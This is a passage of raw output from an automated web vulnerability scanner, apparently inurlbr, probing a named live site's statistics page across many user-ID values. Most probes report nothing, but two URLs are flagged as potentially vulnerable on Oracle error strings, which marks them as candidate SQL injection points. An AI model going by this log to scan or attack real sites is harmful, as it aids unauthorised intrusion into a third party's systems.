10167|_[ + ] More details:: / - / , ISP:
10168|_[ + ] Found:: UNIDENTIFIED
10169
10170 _[ - ]::--------------------------------------------------------------------------------------------------------------
10171|_[ + ] [ 8 / 100 ]-[00:23:13] [ - ]
10172|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=92 ]
10173|_[ + ] Exploit::
10174|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10175|_[ + ] More details:: / - / , ISP:
10176|_[ + ] Found:: UNIDENTIFIED
10177
10178 _[ - ]::--------------------------------------------------------------------------------------------------------------
10179|_[ + ] [ 9 / 100 ]-[00:23:14] [ - ]
10180|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=1 ]
10181|_[ + ] Exploit::
10182|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10183|_[ + ] More details:: / - / , ISP:
10184|_[ + ] Found:: UNIDENTIFIED
10185
10186 _[ - ]::--------------------------------------------------------------------------------------------------------------
10187|_[ + ] [ 10 / 100 ]-[00:23:14] [ - ]
10188|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=37 ]
10189|_[ + ] Exploit::
10190|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10191|_[ + ] More details:: / - / , ISP:
10192|_[ + ] Found:: UNIDENTIFIED
10193
10194 _[ - ]::--------------------------------------------------------------------------------------------------------------
10195|_[ + ] [ 11 / 100 ]-[00:23:15] [ - ]
10196|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=107 ]
10197|_[ + ] Exploit::
10198|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10199|_[ + ] More details:: / - / , ISP:
10200|_[ + ] Found:: UNIDENTIFIED
10201
10202 _[ - ]::--------------------------------------------------------------------------------------------------------------
10203|_[ + ] [ 12 / 100 ]-[00:23:16] [ - ]
10204|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=5 ]
10205|_[ + ] Exploit::
10206|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10207|_[ + ] More details:: / - / , ISP:
10208|_[ + ] Found:: UNIDENTIFIED
10209
10210 _[ - ]::--------------------------------------------------------------------------------------------------------------
10211|_[ + ] [ 13 / 100 ]-[00:23:17] [ - ]
10212|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=2 ]
10213|_[ + ] Exploit::
10214|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10215|_[ + ] More details:: / - / , ISP:
10216|_[ + ] Found:: UNIDENTIFIED
10217
10218 _[ - ]::--------------------------------------------------------------------------------------------------------------
10219|_[ + ] [ 14 / 100 ]-[00:23:17] [ - ]
10220|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=15 ]
10221|_[ + ] Exploit::
10222|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10223|_[ + ] More details:: / - / , ISP:
10224|_[ + ] Found:: UNIDENTIFIED
10225
10226 _[ - ]::--------------------------------------------------------------------------------------------------------------
10227|_[ + ] [ 15 / 100 ]-[00:23:18] [ - ]
10228|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=95 ]
10229|_[ + ] Exploit::
10230|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10231|_[ + ] More details:: / - / , ISP:
10232|_[ + ] Found:: UNIDENTIFIED
10233
10234 _[ - ]::--------------------------------------------------------------------------------------------------------------
10235|_[ + ] [ 16 / 100 ]-[00:23:19] [ - ]
10236|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=29 ]
10237|_[ + ] Exploit::
10238|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10239|_[ + ] More details:: / - / , ISP:
10240|_[ + ] Found:: UNIDENTIFIED
10241
10242 _[ - ]::--------------------------------------------------------------------------------------------------------------
10243|_[ + ] [ 17 / 100 ]-[00:23:19] [ - ]
10244|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=46 ]
10245|_[ + ] Exploit::
10246|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10247|_[ + ] More details:: / - / , ISP:
10248|_[ + ] Found:: UNIDENTIFIED
10249
10250 _[ - ]::--------------------------------------------------------------------------------------------------------------
10251|_[ + ] [ 18 / 100 ]-[00:23:20] [ - ]
10252|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=66 ]
10253|_[ + ] Exploit::
10254|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10255|_[ + ] More details:: / - / , ISP:
10256|_[ + ] Found:: UNIDENTIFIED
10257
10258 _[ - ]::--------------------------------------------------------------------------------------------------------------
10259|_[ + ] [ 19 / 100 ]-[00:23:21] [ - ]
10260|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=50 ]
10261|_[ + ] Exploit::
10262|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10263|_[ + ] More details:: / - / , ISP:
10264|_[ + ] Found:: UNIDENTIFIED
10265
10266 _[ - ]::--------------------------------------------------------------------------------------------------------------
10267|_[ + ] [ 20 / 100 ]-[00:23:21] [ - ]
10268|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=39 ]
10269|_[ + ] Exploit::
10270|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10271|_[ + ] More details:: / - / , ISP:
10272|_[ + ] Found:: UNIDENTIFIED
10273
10274 _[ - ]::--------------------------------------------------------------------------------------------------------------
10275|_[ + ] [ 21 / 100 ]-[00:23:22] [ - ]
10276|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=22 ]
10277|_[ + ] Exploit::
10278|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10279|_[ + ] More details:: / - / , ISP:
10280|_[ + ] Found:: UNIDENTIFIED
10281
10282 _[ - ]::--------------------------------------------------------------------------------------------------------------
10283|_[ + ] [ 22 / 100 ]-[00:23:23] [ - ]
10284|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=75 ]
10285|_[ + ] Exploit::
10286|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10287|_[ + ] More details:: / - / , ISP:
10288|_[ + ] Found:: UNIDENTIFIED
10289
10290 _[ - ]::--------------------------------------------------------------------------------------------------------------
10291|_[ + ] [ 23 / 100 ]-[00:23:23] [ - ]
10292|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=31 ]
10293|_[ + ] Exploit::
10294|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10295|_[ + ] More details:: / - / , ISP:
10296|_[ + ] Found:: UNIDENTIFIED
10297
10298 _[ - ]::--------------------------------------------------------------------------------------------------------------
10299|_[ + ] [ 24 / 100 ]-[00:23:24] [ - ]
10300|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=61 ]
10301|_[ + ] Exploit::
10302|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10303|_[ + ] More details:: / - / , ISP:
10304|_[ + ] Found:: UNIDENTIFIED
10305
10306 _[ - ]::--------------------------------------------------------------------------------------------------------------
10307|_[ + ] [ 25 / 100 ]-[00:23:25] [ - ]
10308|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=64 ]
10309|_[ + ] Exploit::
10310|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10311|_[ + ] More details:: / - / , ISP:
10312|_[ + ] Found:: UNIDENTIFIED
10313
10314 _[ - ]::--------------------------------------------------------------------------------------------------------------
10315|_[ + ] [ 26 / 100 ]-[00:23:25] [ - ]
10316|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=83 ]
10317|_[ + ] Exploit::
10318|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10319|_[ + ] More details:: / - / , ISP:
10320|_[ + ] Found:: UNIDENTIFIED
10321
10322 _[ - ]::--------------------------------------------------------------------------------------------------------------
10323|_[ + ] [ 27 / 100 ]-[00:23:26] [ - ]
10324|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=58 ]
10325|_[ + ] Exploit::
10326|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10327|_[ + ] More details:: / - / , ISP:
10328|_[ + ] Found:: UNIDENTIFIED
10329
10330 _[ - ]::--------------------------------------------------------------------------------------------------------------
10331|_[ + ] [ 28 / 100 ]-[00:23:27] [ - ]
10332|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=76 ]
10333|_[ + ] Exploit::
10334|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10335|_[ + ] More details:: / - / , ISP:
10336|_[ + ] Found:: UNIDENTIFIED
10337
10338 _[ - ]::--------------------------------------------------------------------------------------------------------------
10339|_[ + ] [ 29 / 100 ]-[00:23:28] [ - ]
10340|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=3 ]
10341|_[ + ] Exploit::
10342|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10343|_[ + ] More details:: / - / , ISP:
10344|_[ + ] Found:: UNIDENTIFIED
10345
10346 _[ - ]::--------------------------------------------------------------------------------------------------------------
10347|_[ + ] [ 30 / 100 ]-[00:23:28] [ - ]
10348|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=21 ]
10349|_[ + ] Exploit::
10350|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10351|_[ + ] More details:: / - / , ISP:
10352|_[ + ] Found:: UNIDENTIFIED
10353
10354 _[ - ]::--------------------------------------------------------------------------------------------------------------
10355|_[ + ] [ 31 / 100 ]-[00:23:29] [ ! ]
10356|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=34 ]
10357|_[ + ] Exploit::
10358|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10359|_[ + ] More details:: / - / , ISP:
10360|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
10361|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
10362
10363 _[ - ]::--------------------------------------------------------------------------------------------------------------
10364|_[ + ] [ 32 / 100 ]-[00:23:30] [ - ]
10365|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=49 ]
10366|_[ + ] Exploit::
10367|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10368|_[ + ] More details:: / - / , ISP:
10369|_[ + ] Found:: UNIDENTIFIED
10370
10371 _[ - ]::--------------------------------------------------------------------------------------------------------------
10372|_[ + ] [ 33 / 100 ]-[00:23:31] [ - ]
10373|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=6 ]
10374|_[ + ] Exploit::
10375|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10376|_[ + ] More details:: / - / , ISP:
10377|_[ + ] Found:: UNIDENTIFIED
10378
10379 _[ - ]::--------------------------------------------------------------------------------------------------------------
10380|_[ + ] [ 34 / 100 ]-[00:23:31] [ - ]
10381|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=51 ]
10382|_[ + ] Exploit::
10383|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10384|_[ + ] More details:: / - / , ISP:
10385|_[ + ] Found:: UNIDENTIFIED
10386
10387 _[ - ]::--------------------------------------------------------------------------------------------------------------
10388|_[ + ] [ 35 / 100 ]-[00:23:32] [ - ]
10389|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=33 ]
10390|_[ + ] Exploit::
10391|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10392|_[ + ] More details:: / - / , ISP:
10393|_[ + ] Found:: UNIDENTIFIED
10394
10395 _[ - ]::--------------------------------------------------------------------------------------------------------------
10396|_[ + ] [ 36 / 100 ]-[00:23:33] [ - ]
10397|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=86 ]
10398|_[ + ] Exploit::
10399|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10400|_[ + ] More details:: / - / , ISP:
10401|_[ + ] Found:: UNIDENTIFIED
10402
10403 _[ - ]::--------------------------------------------------------------------------------------------------------------
10404|_[ + ] [ 37 / 100 ]-[00:23:34] [ - ]
10405|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=30 ]
10406|_[ + ] Exploit::
10407|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10408|_[ + ] More details:: / - / , ISP:
10409|_[ + ] Found:: UNIDENTIFIED
10410
10411 _[ - ]::--------------------------------------------------------------------------------------------------------------
10412|_[ + ] [ 38 / 100 ]-[00:23:35] [ - ]
10413|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=43 ]
10414|_[ + ] Exploit::
10415|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10416|_[ + ] More details:: / - / , ISP:
10417|_[ + ] Found:: UNIDENTIFIED
10418
10419 _[ - ]::--------------------------------------------------------------------------------------------------------------
10420|_[ + ] [ 39 / 100 ]-[00:23:35] [ - ]
10421|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=88 ]
10422|_[ + ] Exploit::
10423|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10424|_[ + ] More details:: / - / , ISP:
10425|_[ + ] Found:: UNIDENTIFIED
10426
10427 _[ - ]::--------------------------------------------------------------------------------------------------------------
10428|_[ + ] [ 40 / 100 ]-[00:23:36] [ - ]
10429|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=62 ]
10430|_[ + ] Exploit::
10431|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10432|_[ + ] More details:: / - / , ISP:
10433|_[ + ] Found:: UNIDENTIFIED
10434
10435 _[ - ]::--------------------------------------------------------------------------------------------------------------
10436|_[ + ] [ 41 / 100 ]-[00:23:37] [ - ]
10437|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=80 ]
10438|_[ + ] Exploit::
10439|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10440|_[ + ] More details:: / - / , ISP:
10441|_[ + ] Found:: UNIDENTIFIED
10442
10443 _[ - ]::--------------------------------------------------------------------------------------------------------------
10444|_[ + ] [ 42 / 100 ]-[00:23:37] [ - ]
10445|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=55 ]
10446|_[ + ] Exploit::
10447|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10448|_[ + ] More details:: / - / , ISP:
10449|_[ + ] Found:: UNIDENTIFIED
10450
10451 _[ - ]::--------------------------------------------------------------------------------------------------------------
10452|_[ + ] [ 43 / 100 ]-[00:23:38] [ - ]
10453|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=11 ]
10454|_[ + ] Exploit::
10455|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10456|_[ + ] More details:: / - / , ISP:
10457|_[ + ] Found:: UNIDENTIFIED
10458
10459 _[ - ]::--------------------------------------------------------------------------------------------------------------
10460|_[ + ] [ 44 / 100 ]-[00:23:39] [ - ]
10461|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=14 ]
10462|_[ + ] Exploit::
10463|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10464|_[ + ] More details:: / - / , ISP:
10465|_[ + ] Found:: UNIDENTIFIED
10466
10467 _[ - ]::--------------------------------------------------------------------------------------------------------------
10468|_[ + ] [ 45 / 100 ]-[00:23:40] [ - ]
10469|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=19 ]
10470|_[ + ] Exploit::
10471|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10472|_[ + ] More details:: / - / , ISP:
10473|_[ + ] Found:: UNIDENTIFIED
10474
10475 _[ - ]::--------------------------------------------------------------------------------------------------------------
10476|_[ + ] [ 46 / 100 ]-[00:23:41] [ - ]
10477|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=98 ]
10478|_[ + ] Exploit::
10479|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10480|_[ + ] More details:: / - / , ISP:
10481|_[ + ] Found:: UNIDENTIFIED
10482
10483 _[ - ]::--------------------------------------------------------------------------------------------------------------
10484|_[ + ] [ 47 / 100 ]-[00:23:41] [ - ]
10485|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=82 ]
10486|_[ + ] Exploit::
10487|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10488|_[ + ] More details:: / - / , ISP:
10489|_[ + ] Found:: UNIDENTIFIED
10490
10491 _[ - ]::--------------------------------------------------------------------------------------------------------------
10492|_[ + ] [ 48 / 100 ]-[00:23:42] [ - ]
10493|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=74 ]
10494|_[ + ] Exploit::
10495|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10496|_[ + ] More details:: / - / , ISP:
10497|_[ + ] Found:: UNIDENTIFIED
10498
10499 _[ - ]::--------------------------------------------------------------------------------------------------------------
10500|_[ + ] [ 49 / 100 ]-[00:23:43] [ - ]
10501|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=100 ]
10502|_[ + ] Exploit::
10503|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10504|_[ + ] More details:: / - / , ISP:
10505|_[ + ] Found:: UNIDENTIFIED
10506
10507 _[ - ]::--------------------------------------------------------------------------------------------------------------
10508|_[ + ] [ 50 / 100 ]-[00:23:44] [ - ]
10509|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=25 ]
10510|_[ + ] Exploit::
10511|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10512|_[ + ] More details:: / - / , ISP:
10513|_[ + ] Found:: UNIDENTIFIED
10514
10515 _[ - ]::--------------------------------------------------------------------------------------------------------------
10516|_[ + ] [ 51 / 100 ]-[00:23:44] [ - ]
10517|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=augustagrenier ]
10518|_[ + ] Exploit::
10519|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10520|_[ + ] More details:: / - / , ISP:
10521|_[ + ] Found:: UNIDENTIFIED
10522
10523 _[ - ]::--------------------------------------------------------------------------------------------------------------
10524|_[ + ] [ 52 / 100 ]-[00:23:45] [ - ]
10525|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=56 ]
10526|_[ + ] Exploit::
10527|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10528|_[ + ] More details:: / - / , ISP:
10529|_[ + ] Found:: UNIDENTIFIED
10530
10531 _[ - ]::--------------------------------------------------------------------------------------------------------------
10532|_[ + ] [ 53 / 100 ]-[00:23:46] [ - ]
10533|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=17 ]
10534|_[ + ] Exploit::
10535|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10536|_[ + ] More details:: / - / , ISP:
10537|_[ + ] Found:: UNIDENTIFIED
10538
10539 _[ - ]::--------------------------------------------------------------------------------------------------------------
10540|_[ + ] [ 54 / 100 ]-[00:23:46] [ - ]
10541|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=26 ]
10542|_[ + ] Exploit::
10543|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10544|_[ + ] More details:: / - / , ISP:
10545|_[ + ] Found:: UNIDENTIFIED
10546
10547 _[ - ]::--------------------------------------------------------------------------------------------------------------
10548|_[ + ] [ 55 / 100 ]-[00:23:47] [ - ]
10549|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=44 ]
10550|_[ + ] Exploit::
10551|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10552|_[ + ] More details:: / - / , ISP:
10553|_[ + ] Found:: UNIDENTIFIED
10554
10555 _[ - ]::--------------------------------------------------------------------------------------------------------------
10556|_[ + ] [ 56 / 100 ]-[00:23:48] [ ! ]
10557|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=60 ]
10558|_[ + ] Exploit::
10559|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10560|_[ + ] More details:: / - / , ISP:
10561|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
10562|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
10563
10564 _[ - ]::--------------------------------------------------------------------------------------------------------------
10565|_[ + ] [ 57 / 100 ]-[00:23:49] [ - ]
10566|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=45 ]
10567|_[ + ] Exploit::
10568|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10569|_[ + ] More details:: / - / , ISP:
10570|_[ + ] Found:: UNIDENTIFIED
10571
10572 _[ - ]::--------------------------------------------------------------------------------------------------------------
10573|_[ + ] [ 58 / 100 ]-[00:23:49] [ - ]
10574|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=16 ]
10575|_[ + ] Exploit::
10576|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10577|_[ + ] More details:: / - / , ISP:
10578|_[ + ] Found:: UNIDENTIFIED
10579
10580 _[ - ]::--------------------------------------------------------------------------------------------------------------
10581|_[ + ] [ 59 / 100 ]-[00:23:50] [ - ]
10582|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=23 ]
10583|_[ + ] Exploit::
10584|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10585|_[ + ] More details:: / - / , ISP:
10586|_[ + ] Found:: UNIDENTIFIED
10587
10588 _[ - ]::--------------------------------------------------------------------------------------------------------------
10589|_[ + ] [ 60 / 100 ]-[00:23:51] [ - ]
10590|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=20 ]
10591|_[ + ] Exploit::
10592|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10593|_[ + ] More details:: / - / , ISP:
10594|_[ + ] Found:: UNIDENTIFIED
10595
10596 _[ - ]::--------------------------------------------------------------------------------------------------------------
10597|_[ + ] [ 61 / 100 ]-[00:23:52] [ - ]
10598|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=106 ]
10599|_[ + ] Exploit::
10600|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10601|_[ + ] More details:: / - / , ISP:
10602|_[ + ] Found:: UNIDENTIFIED
10603
10604 _[ - ]::--------------------------------------------------------------------------------------------------------------
10605|_[ + ] [ 62 / 100 ]-[00:23:52] [ - ]
10606|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=28 ]
10607|_[ + ] Exploit::
10608|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10609|_[ + ] More details:: / - / , ISP:
10610|_[ + ] Found:: UNIDENTIFIED
10611
10612 _[ - ]::--------------------------------------------------------------------------------------------------------------
10613|_[ + ] [ 63 / 100 ]-[00:23:53] [ - ]
10614|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=34 ]
10615|_[ + ] Exploit::
10616|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10617|_[ + ] More details:: / - / , ISP:
10618|_[ + ] Found:: UNIDENTIFIED
10619
10620 _[ - ]::--------------------------------------------------------------------------------------------------------------
10621|_[ + ] [ 64 / 100 ]-[00:23:54] [ - ]
10622|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=9 ]
10623|_[ + ] Exploit::
10624|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10625|_[ + ] More details:: / - / , ISP:
10626|_[ + ] Found:: UNIDENTIFIED
10627
10628 _[ - ]::--------------------------------------------------------------------------------------------------------------
10629|_[ + ] [ 65 / 100 ]-[00:23:54] [ - ]
10630|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=59 ]
10631|_[ + ] Exploit::
10632|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10633|_[ + ] More details:: / - / , ISP:
10634|_[ + ] Found:: UNIDENTIFIED
10635
10636 _[ - ]::--------------------------------------------------------------------------------------------------------------
10637|_[ + ] [ 66 / 100 ]-[00:23:55] [ - ]
10638|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=62 ]
10639|_[ + ] Exploit::
10640|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10641|_[ + ] More details:: / - / , ISP:
10642|_[ + ] Found:: UNIDENTIFIED
10643
10644 _[ - ]::--------------------------------------------------------------------------------------------------------------
10645|_[ + ] [ 67 / 100 ]-[00:23:56] [ - ]
10646|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=77 ]
10647|_[ + ] Exploit::
10648|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10649|_[ + ] More details:: / - / , ISP:
10650|_[ + ] Found:: UNIDENTIFIED
10651
10652 _[ - ]::--------------------------------------------------------------------------------------------------------------
10653|_[ + ] [ 68 / 100 ]-[00:23:56] [ - ]
10654|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=47 ]
10655|_[ + ] Exploit::
10656|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10657|_[ + ] More details:: / - / , ISP:
10658|_[ + ] Found:: UNIDENTIFIED
10659
10660 _[ - ]::--------------------------------------------------------------------------------------------------------------
10661|_[ + ] [ 69 / 100 ]-[00:23:57] [ - ]
10662|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=4 ]
10663|_[ + ] Exploit::
10664|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10665|_[ + ] More details:: / - / , ISP:
10666|_[ + ] Found:: UNIDENTIFIED
10667
10668 _[ - ]::--------------------------------------------------------------------------------------------------------------
10669|_[ + ] [ 70 / 100 ]-[00:23:58] [ - ]
10670|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=52 ]
10671|_[ + ] Exploit::
10672|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10673|_[ + ] More details:: / - / , ISP:
10674|_[ + ] Found:: UNIDENTIFIED
10675
10676 _[ - ]::--------------------------------------------------------------------------------------------------------------
10677|_[ + ] [ 71 / 100 ]-[00:23:59] [ - ]
